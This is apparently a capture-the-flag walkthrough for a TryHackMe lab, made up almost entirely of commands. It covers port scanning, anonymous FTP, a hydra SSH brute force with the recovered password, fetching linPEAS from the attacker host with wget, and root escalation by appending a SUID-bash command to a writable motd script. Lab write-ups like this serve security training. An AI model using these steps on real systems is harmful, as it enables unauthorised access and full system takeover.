>> nmap 10.10.240.29

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

>> ftp 10.10.240.29
>> anonymous

>> mget task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

>> mget locks.txt
## "possible passwords" to brute force ssh

>> hydra -l lin -P locks.txt 10.10.240.29 ssh
[22][ssh] host: 10.10.240.29   login: lin   password: RedDr4gonSynd1cat3

>> ssh lin@10.10.240.29
@>> cat user.txt
THM{CR1M3_SyNd1C4T3}

>> cd /opt/PEAS/linPEAS
>> cp linpeas.sh /

>> python3 -m http.server 1234

@>> wget 10.10.239.119:1234/linpeas.sh
@>> chmod +777 linpeas.sh
[+] Interesting writable files owned by me
/etc/update-motd.d/00-header

Google: /etc/update-motd.d/00-header privilege escalation
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/update-motd-privilege-escalation/

@>> echo "cp /bin/bash /home/lin/bash && chmod u+s /home/lin/bash" >> /etc/update-motd.d/00-header
@>> logout

>> ssh lin@10.10.240.29

@>> cd /home/lin
@>> ./bash -p
@>> cat root.txt 
THM{80UN7Y_h4cK3r}

